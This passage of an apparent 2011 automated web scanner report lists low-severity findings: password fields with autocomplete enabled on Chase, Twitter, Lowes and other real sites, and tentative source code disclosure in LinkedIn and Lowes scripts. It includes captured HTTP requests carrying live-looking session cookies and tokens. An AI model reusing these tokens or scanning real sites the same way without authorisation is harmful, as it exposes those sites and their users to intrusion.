Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

12.6. https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://chaseonline.chase.com
Path:	/Public/Reidentify/ReidentifyFilterView.aspx

Issue detail

The page contains a form with the following action URL:

https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx?LOB=RBGLogon

The form contains the following password fields with autocomplete enabled:

txtSecurityKeyTA
txtSecurityKeyQP
txtIDNumberPA

Request

GET /Public/Reidentify/ReidentifyFilterView.aspx?LOB=RBGLogon HTTP/1.1
Host: chaseonline.chase.com
Connection: keep-alive
Referer: https://www.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 12 Jul 2011 15:29:19 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private,max-age=0,must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Length: 42906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...
</style>
<form name="frmReidentifyFilterView" method="post" action="ReidentifyFilterView.aspx?LOB=RBGLogon" onsubmit="javascript:return WebForm_OnSubmit();" id="frmReidentifyFilterView">
<div>
...[SNIP]...
<td>
<input name="txtSecurityKeyTA" type="password" maxlength="32" id="txtSecurityKeyTA" title="Required Field. Enter Security code" class="inputTextBox" style="width: 130px" />
<br />
...[SNIP]...
<td>
<input name="txtSecurityKeyQP" type="password" maxlength="32" id="txtSecurityKeyQP" title="Required Field. Enter Security code" class="inputTextBox" style="width: 130px" />
<br />
...[SNIP]...
<td>
<input name="txtIDNumberPA" type="password" maxlength="32" id="txtIDNumberPA" title="Required Field. Enter ID Number" class="inputTextBox" style="width: 130px" />
 <a href="javascript:OpenWindowHelp('https://www.chase.com/ccp/index.jsp?pg_name=shared/help/page/IDnumber_help');"
class="help
...[SNIP]...

12.7. https://store.popcap.com/payment.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The page contains a form with the following action URL:

https://store.popcap.com/payment.php

The form contains the following password fields with autocomplete enabled:

new_password
verify_password

Request

Response

12.8. https://store.popcap.com/payment.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The page contains a form with the following action URL:

https://store.popcap.com/passport_login.php

The form contains the following password field with autocomplete enabled:

account_password

Request

Response

12.9. https://store.popcap.com/payment.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The page contains a form with the following action URL:

https://store.popcap.com/payment.php

The form contains the following password field with autocomplete enabled:

account_password

Request

Response

12.10. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions?phx=1

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.riema.ri.gov/cybersecurity/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; guest_id=v1%3A130884465537011414; k=173.193.214.243.1310208653927867; __utma=43838368.1598605414.1305368954.1310208656.1310393759.14; __utmz=43838368.1310393759.14.7.utmcsr=beautyoftheweb.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=43838368.lang%3A%20en; original_referer=ZLhHHTiegr%2Foii8EN6JdFQWQUyflGgAMHTKQFsYyQk38yALXl3deMA%3D%3D; external_referer=ZLhHHTiegr%2Foii8EN6JdFQWQUyflGgAMHTKQFsYyQk38yALXl3deMA%3D%3D%7C0; _twitter_sess=BAh7CToOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--96b41f333b537fd1d982aa98604635d0f23ee714

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:04:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310519088-70633-31157
ETag: "888bbb7fa36ebc999c9a2032d7e5016e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:04:48 GMT
X-Runtime: 0.01368
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 83cd16336a1e70601423a17f2644a8e3b11de69e
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50536
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...

12.11. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions?phx=1

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:04:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310519088-70633-31157
ETag: "888bbb7fa36ebc999c9a2032d7e5016e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:04:48 GMT
X-Runtime: 0.01368
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 83cd16336a1e70601423a17f2644a8e3b11de69e
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50536
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...

12.12. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/signup

The form contains the following password field with autocomplete enabled:

user[user_password]

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:04:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310519088-70633-31157
ETag: "888bbb7fa36ebc999c9a2032d7e5016e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:04:48 GMT
X-Runtime: 0.01368
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 83cd16336a1e70601423a17f2644a8e3b11de69e
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50536
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...

12.13. http://ucc.state.ri.us/loginsystem/login_form.asp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login_form.asp

Issue detail

The page contains a form with the following action URL:

http://ucc.state.ri.us/loginsystem/CheckLogin.asp

The form contains the following password field with autocomplete enabled:

Request

Response

12.14. http://www.citizencorps.gov/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.citizencorps.gov
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.citizencorps.gov/cc/secure/index.do

The form contains the following password field with autocomplete enabled:

j_password

Request

GET / HTTP/1.1
Host: www.citizencorps.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:38 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 18994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <title>Ci
...[SNIP]...
</h3>
           <form action="https://www.citizencorps.gov/cc/secure/index.do" method="post" id="logIn">
           <p>
...[SNIP]...
</label>
<input id="password" name="j_password" value="Your Password" tabindex="3" onfocus="clearValue(this)" onblur="resetValue(this)" type="password" /></p>
...[SNIP]...

12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page contains a form with the following action URL:

https://www.lowes.com/webapp/wcs/stores/servlet/Logon

The form contains the following password field with autocomplete enabled:

logonPassword

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 00:52:35 GMT
Set-Cookie: TS176ebc=8af291dbf163c57592847d6d73d5eb85d172642e494065004e1ce3f1; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<br /> -->

<form method="post" name="Logon" action="Logon" id="Logon">
<input type="hidden" name="storeId" value="10151" id="WC_UserLogonForm_FormInput_storeId_In_Logon_1"/>
...[SNIP]...
<div class="form-input-block">
<input class="small" type="password" name="logonPassword" value="" id="logonPassword" onfocus="this.onkeypress = pressEnter;" />
</div>
...[SNIP]...

13. Source code disclosure previous next
There are 6 instances of this issue:

http://platform.linkedin.com/js/nonSecureAnonymousFramework
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/AJAXUserInterface/javascript/Common.js
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js
https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

13.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://platform.linkedin.com
Path:	/js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1126-RC2.7011-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203; visit=G

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Tue, 12 Jul 2011 20:47:12 GMT
Expires: Tue, 19 Jul 2011 20:47:12 GMT
Last-Modified: Thu, 07 Jul 2011 04:27:11 GMT
Server: ECS (dca/53C5)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 124999

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1126-RC2.7011-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

13.2. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/AJAXUserInterface/javascript/Common.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/AJAXUserInterface/javascript/Common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/AJAXUserInterface/javascript/Common.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=3npJGdCEGA39cXndCp1mhBo99ohPFg9QUCqlPZDTH03dVbJkclo_8Rw; akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 29 Jul 2009 15:04:32 GMT
ETag: "114004c-2134-81234000"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8500
Expires: Tue, 12 Jul 2011 21:32:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:43 GMT
Connection: close
Vary: Accept-Encoding

//<%--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* WebSphere Commerce
//*
//* (c) Copyright IBM Corp. 2007
//* All Rights Reserved
//*
//* US Government Users Restricted Rights - Use, duplication or
//* disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
//*
//*-------------------------------------------------------------------
//*
//--%>

   dojo.require("wc.widget.RefreshArea");

   dojo.require("dojo.parser");

   dojo.require("dojox.collections.ArrayList");

   dojo.require("wc.widget.RefreshArea");
   dojo.require("wc.render.Refr
...[SNIP]...

13.3. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/pc_Flooring_4294934373_4294937087_?cm_sp=Flooring-_-Home|A2R2-_-Merch|Flooring_Event_Page_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}; stop_mobi=yes; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmRS=&t1=1310506254730&t2=1310506258515&t3=1310506283316&lti=1310506282770&ln=Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop&hr=/pc_Flooring_4294934373_4294937087_%3Fcm_sp%3DFlooring-_-Home%7CA2R2-_-Merch%7CFlooring_Event_Page_Shop%26cm_cr%3DHomepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop&fti=&fn=storeSearchForm%3A0%3BstoreUpdateForm%3A1%3BsearchNearestStoresForm%3A2%3BfrmQuickSearch%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME&ho=www7.lowes.com/eluminate%3F&ci=90226018; fsr.a=1310506283883

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 07 Jul 2011 16:52:15 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 116111
Expires: Tue, 12 Jul 2011 21:31:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:31:24 GMT
Connection: close
Vary: Accept-Encoding

/*
This is to ensure that a console object is always available as well as it...s many methods.
*/

if (!window.console || !console.firebug){
var methods = ["log", "debug", "info", "warn", "error"
...[SNIP]...
s subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Cookie
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   /**
    * Class for working with browser cookies. Simplifies setting, getting, deleting
   *
    * @
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Prefs
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
   * Simplified Cookie based preferences for users
   */
var Prefs = {
    // Store
...[SNIP]...
is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.Utils
* @Author WCope
* @version <%=VERSION=%>
*/

(function(){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   Lowes.PageTypes = {
       Other        : 0,
       List        : 1,
       Details        : 2,
       Category    : 3
   };

   var Util
...[SNIP]...
hout Lowes.com's written consent.
*/

/**
* Lowes.UI Namespace Object that will be the parent of all
* Lowes UI components library classes.
*
* @Package: Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Sil
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Accordion
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
m Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Carousel
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/
;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Quic
...[SNIP]...
.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Modal
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
s.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Tabs
* @member Lowes.UI
* @Author WCope
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...
Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.UI.Slideshow
* @member Lowes.UI
* @Author MHead
* @version <%=VERSION=%>
*/

;(function($){
   // Grab Lowes namespace object or create a new one.
   var Lowes = window.Lowes || {};

   // Grab Lowes UI namespace object or create a new one.
   Lowes.UI = Lowes.UI || {};

   // Qui
...[SNIP]...

13.4. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/pc_Flooring_4294934373_4294937087_?cm_sp=Flooring-_-Home|A2R2-_-Merch|Flooring_Event_Page_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}; stop_mobi=yes; 